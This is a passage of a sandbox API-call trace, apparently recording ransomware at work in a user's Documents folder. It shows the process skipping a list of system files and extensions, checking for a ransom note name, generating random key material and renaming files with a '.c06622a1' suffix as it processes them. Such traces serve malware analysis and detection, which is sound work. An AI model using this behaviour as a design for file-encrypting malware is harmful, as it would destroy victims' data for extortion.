halpmcxz\\documents\\rg_etqm_g.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rg_etqm_g.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0157.947] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.947] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x245f7501 [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62bbb339 [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11317af4 [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66ffcaec [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f47005c [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e8b9272 [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57fe02fb [0157.954] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f1f74b3 [0157.957] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xcd2f7153 [0157.958] RtlComputeCrc32 (PartialCrc=0x7153, Buffer=0x3480094, Length=0x80) returned 0xf60ec041 [0157.958] RtlComputeCrc32 (PartialCrc=0xc041, Buffer=0x3480094, Length=0x80) returned 0xe65e3fd1 [0157.958] RtlComputeCrc32 (PartialCrc=0x3fd1, Buffer=0x3480094, Length=0x80) returned 0x18816ae [0157.958] RtlComputeCrc32 (PartialCrc=0x16ae, Buffer=0x3480094, Length=0x80) returned 0x66752478 [0157.958] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0157.958] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.959] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1dddd0, ftCreationTime.dwHighDateTime=0x1d5d9f6, ftLastAccessTime.dwLowDateTime=0xe3441360, ftLastAccessTime.dwHighDateTime=0x1d5e4e9, ftLastWriteTime.dwLowDateTime=0xe3441360, ftLastWriteTime.dwHighDateTime=0x1d5e4e9, nFileSizeHigh=0x0, nFileSizeLow=0x3bcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="v8B7 p7omAvTnvma.odp", cAlternateFileName="V8B7P7~1.ODP")) returned 1 [0157.960] _wcsicmp (_Str1="v8B7 p7omAvTnvma.odp", _Str2="README.c06622a1.TXT") returned 4 [0157.960] wcsstr (_Str="v8B7 p7omAvTnvma.odp", _SubStr="README") returned 0x0 [0157.960] _wcsicmp (_Str1="autorun.inf", _Str2="v8B7 p7omAvTnvma.odp") returned -21 [0157.960] wcslen (_String="autorun.inf") returned 0xb [0157.960] _wcsicmp (_Str1="boot.ini", _Str2="v8B7 p7omAvTnvma.odp") returned -20 [0157.960] wcslen (_String="boot.ini") returned 0x8 [0157.960] _wcsicmp (_Str1="bootfont.bin", _Str2="v8B7 p7omAvTnvma.odp") returned -20 [0157.961] wcslen (_String="bootfont.bin") returned 0xc [0157.961] _wcsicmp (_Str1="bootsect.bak", _Str2="v8B7 p7omAvTnvma.odp") returned -20 [0157.961] wcslen (_String="bootsect.bak") returned 0xc [0157.961] _wcsicmp (_Str1="desktop.ini", _Str2="v8B7 p7omAvTnvma.odp") returned -18 [0157.961] wcslen (_String="desktop.ini") returned 0xb [0157.961] _wcsicmp (_Str1="iconcache.db", _Str2="v8B7 p7omAvTnvma.odp") returned -13 [0157.961] wcslen (_String="iconcache.db") returned 0xc [0157.961] _wcsicmp (_Str1="ntldr", _Str2="v8B7 p7omAvTnvma.odp") returned -8 [0157.961] wcslen (_String="ntldr") returned 0x5 [0157.961] _wcsicmp (_Str1="ntuser.dat", _Str2="v8B7 p7omAvTnvma.odp") returned -8 [0157.961] wcslen (_String="ntuser.dat") returned 0xa [0157.961] _wcsicmp (_Str1="ntuser.dat.log", _Str2="v8B7 p7omAvTnvma.odp") returned -8 [0157.961] wcslen (_String="ntuser.dat.log") returned 0xe [0157.961] _wcsicmp (_Str1="ntuser.ini", _Str2="v8B7 p7omAvTnvma.odp") returned -8 [0157.961] wcslen (_String="ntuser.ini") returned 0xa [0157.961] _wcsicmp (_Str1="thumbs.db", _Str2="v8B7 p7omAvTnvma.odp") returned -2 [0157.961] wcslen (_String="thumbs.db") returned 0x9 [0157.961] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0157.961] wcslen (_String="386") returned 0x3 [0157.961] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0157.961] wcslen (_String="adv") returned 0x3 [0157.961] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0157.961] wcslen (_String="ani") returned 0x3 [0157.961] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0157.961] wcslen (_String="bat") returned 0x3 [0157.961] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0157.961] wcslen (_String="bin") returned 0x3 [0157.961] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0157.961] wcslen (_String="cab") returned 0x3 [0157.961] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0157.961] wcslen (_String="cmd") returned 0x3 [0157.962] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0157.962] wcslen (_String="com") returned 0x3 [0157.962] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0157.962] wcslen (_String="cpl") returned 0x3 [0157.962] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0157.962] wcslen (_String="cur") returned 0x3 [0157.962] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0157.962] wcslen (_String="deskthemepack") returned 0xd [0157.962] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0157.962] wcslen (_String="diagcab") returned 0x7 [0157.962] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0157.962] wcslen (_String="diagcfg") returned 0x7 [0157.962] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0157.962] wcslen (_String="diagpkg") returned 0x7 [0157.962] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0157.962] wcslen (_String="dll") returned 0x3 [0157.962] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0157.962] wcslen (_String="drv") returned 0x3 [0157.962] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0157.962] wcslen (_String="exe") returned 0x3 [0157.962] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0157.962] wcslen (_String="hlp") returned 0x3 [0157.962] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0157.962] wcslen (_String="icl") returned 0x3 [0157.962] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0157.962] wcslen (_String="icns") returned 0x4 [0157.962] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0157.962] wcslen (_String="ico") returned 0x3 [0157.962] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0157.962] wcslen (_String="ics") returned 0x3 [0157.962] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0157.962] wcslen (_String="idx") returned 0x3 [0157.962] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0157.962] wcslen (_String="ldf") returned 0x3 [0157.963] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0157.963] wcslen (_String="lnk") returned 0x3 [0157.963] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0157.963] wcslen (_String="mod") returned 0x3 [0157.963] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0157.963] wcslen (_String="mpa") returned 0x3 [0157.963] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0157.963] wcslen (_String="msc") returned 0x3 [0157.963] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0157.963] wcslen (_String="msp") returned 0x3 [0157.963] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0157.963] wcslen (_String="msstyles") returned 0x8 [0157.963] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0157.963] wcslen (_String="msu") returned 0x3 [0157.963] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0157.963] wcslen (_String="nls") returned 0x3 [0157.963] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0157.963] wcslen (_String="nomedia") returned 0x7 [0157.963] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0157.963] wcslen (_String="ocx") returned 0x3 [0157.963] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0157.963] wcslen (_String="prf") returned 0x3 [0157.963] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0157.963] wcslen (_String="ps1") returned 0x3 [0157.963] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0157.963] wcslen (_String="rom") returned 0x3 [0157.963] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0157.963] wcslen (_String="rtp") returned 0x3 [0157.963] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0157.963] wcslen (_String="scr") returned 0x3 [0157.963] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0157.963] wcslen (_String="shs") returned 0x3 [0157.963] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0157.963] wcslen (_String="spl") returned 0x3 [0157.964] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0157.964] wcslen (_String="sys") returned 0x3 [0157.964] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0157.964] wcslen (_String="theme") returned 0x5 [0157.964] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0157.964] wcslen (_String="themepack") returned 0x9 [0157.964] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0157.964] wcslen (_String="wpx") returned 0x3 [0157.964] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0157.964] wcslen (_String="lock") returned 0x4 [0157.964] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0157.964] wcslen (_String="key") returned 0x3 [0157.964] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0157.964] wcslen (_String="hta") returned 0x3 [0157.964] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0157.964] wcslen (_String="msi") returned 0x3 [0157.964] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0157.964] wcslen (_String="pdb") returned 0x3 [0157.964] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0157.964] wcslen (_String="sqlite") returned 0x6 [0157.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.964] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.964] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.964] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.964] wcscpy (in: _Dest=0x32100a0, _Source="v8B7 p7omAvTnvma.odp" | out: _Dest="v8B7 p7omAvTnvma.odp") returned="v8B7 p7omAvTnvma.odp" [0157.964] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp", dwFileAttributes=0x80) returned 1 [0157.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v8b7 p7omavtnvma.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0157.965] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.965] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.966] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xa9ec2cad [0157.966] RtlComputeCrc32 (PartialCrc=0x2cad, Buffer=0x32ec24, Length=0x80) returned 0x40845f0f [0157.966] RtlComputeCrc32 (PartialCrc=0x5f0f, Buffer=0x32ec24, Length=0x80) returned 0x31ba53 [0157.966] RtlComputeCrc32 (PartialCrc=0xba53, Buffer=0x32ec24, Length=0x80) returned 0xc84f93de [0157.966] RtlComputeCrc32 (PartialCrc=0x93de, Buffer=0x32ec24, Length=0x80) returned 0x6e1c508 [0157.966] CloseHandle (hObject=0x1cc) returned 1 [0157.966] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.966] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp" [0157.966] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp") returned 0x40 [0157.966] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.966] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v8b7 p7omavtnvma.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v8b7 p7omavtnvma.odp.c06622a1"), dwFlags=0x8) returned 1 [0157.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\v8B7 p7omAvTnvma.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v8b7 p7omavtnvma.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0157.971] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.971] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0157.980] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xecd65b4 [0157.980] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b16e0be [0157.980] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f38add8 [0157.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79ddd72 [0157.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x758ed919 [0157.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x45a5b7dc [0157.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3aac7164 [0157.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fd89fef [0157.984] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x111062c8 [0157.984] RtlComputeCrc32 (PartialCrc=0x62c8, Buffer=0x3510094, Length=0x80) returned 0xe236add4 [0157.984] RtlComputeCrc32 (PartialCrc=0xadd4, Buffer=0x3510094, Length=0x80) returned 0xff754c6b [0157.984] RtlComputeCrc32 (PartialCrc=0x4c6b, Buffer=0x3510094, Length=0x80) returned 0xfdb0798b [0157.984] RtlComputeCrc32 (PartialCrc=0x798b, Buffer=0x3510094, Length=0x80) returned 0x31f99233 [0157.984] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0157.984] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.986] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.988] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff0c4390, ftCreationTime.dwHighDateTime=0x1d5b507, ftLastAccessTime.dwLowDateTime=0xf0d9ff0, ftLastAccessTime.dwHighDateTime=0x1d5add8, ftLastWriteTime.dwLowDateTime=0xf0d9ff0, ftLastWriteTime.dwHighDateTime=0x1d5add8, nFileSizeHigh=0x0, nFileSizeLow=0x72cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="xgPWfuE3CiauL.pptx", cAlternateFileName="XGPWFU~1.PPT")) returned 1 [0157.988] _wcsicmp (_Str1="xgPWfuE3CiauL.pptx", _Str2="README.c06622a1.TXT") returned 6 [0157.988] wcsstr (_Str="xgPWfuE3CiauL.pptx", _SubStr="README") returned 0x0 [0157.988] _wcsicmp (_Str1="autorun.inf", _Str2="xgPWfuE3CiauL.pptx") returned -23 [0157.988] wcslen (_String="autorun.inf") returned 0xb [0157.988] _wcsicmp (_Str1="boot.ini", _Str2="xgPWfuE3CiauL.pptx") returned -22 [0157.988] wcslen (_String="boot.ini") returned 0x8 [0157.988] _wcsicmp (_Str1="bootfont.bin", _Str2="xgPWfuE3CiauL.pptx") returned -22 [0157.988] wcslen (_String="bootfont.bin") returned 0xc [0157.988] _wcsicmp (_Str1="bootsect.bak", _Str2="xgPWfuE3CiauL.pptx") returned -22 [0157.988] wcslen (_String="bootsect.bak") returned 0xc [0157.988] _wcsicmp (_Str1="desktop.ini", _Str2="xgPWfuE3CiauL.pptx") returned -20 [0157.988] wcslen (_String="desktop.ini") returned 0xb [0157.988] _wcsicmp (_Str1="iconcache.db", _Str2="xgPWfuE3CiauL.pptx") returned -15 [0157.988] wcslen (_String="iconcache.db") returned 0xc [0157.988] _wcsicmp (_Str1="ntldr", _Str2="xgPWfuE3CiauL.pptx") returned -10 [0157.988] wcslen (_String="ntldr") returned 0x5 [0157.988] _wcsicmp (_Str1="ntuser.dat", _Str2="xgPWfuE3CiauL.pptx") returned -10 [0157.988] wcslen (_String="ntuser.dat") returned 0xa [0157.988] _wcsicmp (_Str1="ntuser.dat.log", _Str2="xgPWfuE3CiauL.pptx") returned -10 [0157.988] wcslen (_String="ntuser.dat.log") returned 0xe [0157.988] _wcsicmp (_Str1="ntuser.ini", _Str2="xgPWfuE3CiauL.pptx") returned -10 [0157.988] wcslen (_String="ntuser.ini") returned 0xa [0157.988] _wcsicmp (_Str1="thumbs.db", _Str2="xgPWfuE3CiauL.pptx") returned -4 [0157.988] wcslen (_String="thumbs.db") returned 0x9 [0157.989] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.989] wcslen (_String="386") returned 0x3 [0157.989] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.989] wcslen (_String="adv") returned 0x3 [0157.989] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.989] wcslen (_String="ani") returned 0x3 [0157.989] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.989] wcslen (_String="bat") returned 0x3 [0157.989] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.989] wcslen (_String="bin") returned 0x3 [0157.989] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.989] wcslen (_String="cab") returned 0x3 [0157.989] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.989] wcslen (_String="cmd") returned 0x3 [0157.989] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.989] wcslen (_String="com") returned 0x3 [0157.989] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.989] wcslen (_String="cpl") returned 0x3 [0157.989] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.989] wcslen (_String="cur") returned 0x3 [0157.989] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.989] wcslen (_String="deskthemepack") returned 0xd [0157.989] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.989] wcslen (_String="diagcab") returned 0x7 [0157.989] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.990] wcslen (_String="diagcfg") returned 0x7 [0157.990] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.990] wcslen (_String="diagpkg") returned 0x7 [0157.990] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.990] wcslen (_String="dll") returned 0x3 [0157.990] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.990] wcslen (_String="drv") returned 0x3 [0157.990] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.990] wcslen (_String="exe") returned 0x3 [0157.990] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.990] wcslen (_String="hlp") returned 0x3 [0157.990] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.990] wcslen (_String="icl") returned 0x3 [0157.990] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.990] wcslen (_String="icns") returned 0x4 [0157.990] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.990] wcslen (_String="ico") returned 0x3 [0157.990] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.990] wcslen (_String="ics") returned 0x3 [0157.990] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.990] wcslen (_String="idx") returned 0x3 [0157.990] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.990] wcslen (_String="ldf") returned 0x3 [0157.990] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.990] wcslen (_String="lnk") returned 0x3 [0157.991] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.991] wcslen (_String="mod") returned 0x3 [0157.991] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.991] wcslen (_String="mpa") returned 0x3 [0157.991] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.991] wcslen (_String="msc") returned 0x3 [0157.991] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.991] wcslen (_String="msp") returned 0x3 [0157.991] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.991] wcslen (_String="msstyles") returned 0x8 [0157.991] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.991] wcslen (_String="msu") returned 0x3 [0157.991] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.991] wcslen (_String="nls") returned 0x3 [0157.991] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.991] wcslen (_String="nomedia") returned 0x7 [0157.991] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.991] wcslen (_String="ocx") returned 0x3 [0157.991] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.991] wcslen (_String="prf") returned 0x3 [0157.991] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.991] wcslen (_String="ps1") returned 0x3 [0157.991] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.991] wcslen (_String="rom") returned 0x3 [0157.991] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.991] wcslen (_String="rtp") returned 0x3 [0157.991] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.991] wcslen (_String="scr") returned 0x3 [0157.991] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.991] wcslen (_String="shs") returned 0x3 [0157.991] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.991] wcslen (_String="spl") returned 0x3 [0157.991] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.991] wcslen (_String="sys") returned 0x3 [0157.992] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.992] wcslen (_String="theme") returned 0x5 [0157.992] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.992] wcslen (_String="themepack") returned 0x9 [0157.992] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.992] wcslen (_String="wpx") returned 0x3 [0157.992] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.992] wcslen (_String="lock") returned 0x4 [0157.992] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.992] wcslen (_String="key") returned 0x3 [0157.992] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.992] wcslen (_String="hta") returned 0x3 [0157.992] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.992] wcslen (_String="msi") returned 0x3 [0157.992] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.992] wcslen (_String="pdb") returned 0x3 [0157.992] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.992] wcslen (_String="sqlite") returned 0x6 [0157.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.992] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.992] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.992] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.992] wcscpy (in: _Dest=0x32100a0, _Source="xgPWfuE3CiauL.pptx" | out: _Dest="xgPWfuE3CiauL.pptx") returned="xgPWfuE3CiauL.pptx" [0157.992] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx", dwFileAttributes=0x80) returned 1 [0157.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgpwfue3ciaul.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0157.993] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.993] ReadFile (in: hFile=0x1e0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.994] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xab00891a [0157.994] RtlComputeCrc32 (PartialCrc=0x891a, Buffer=0x32ec24, Length=0x80) returned 0x4317b59a [0157.994] RtlComputeCrc32 (PartialCrc=0xb59a, Buffer=0x32ec24, Length=0x80) returned 0x51354460 [0157.994] RtlComputeCrc32 (PartialCrc=0x4460, Buffer=0x32ec24, Length=0x80) returned 0xe9b1459f [0157.994] RtlComputeCrc32 (PartialCrc=0x459f, Buffer=0x32ec24, Length=0x80) returned 0xdb865d2e [0157.994] CloseHandle (hObject=0x1e0) returned 1 [0157.994] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.994] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS 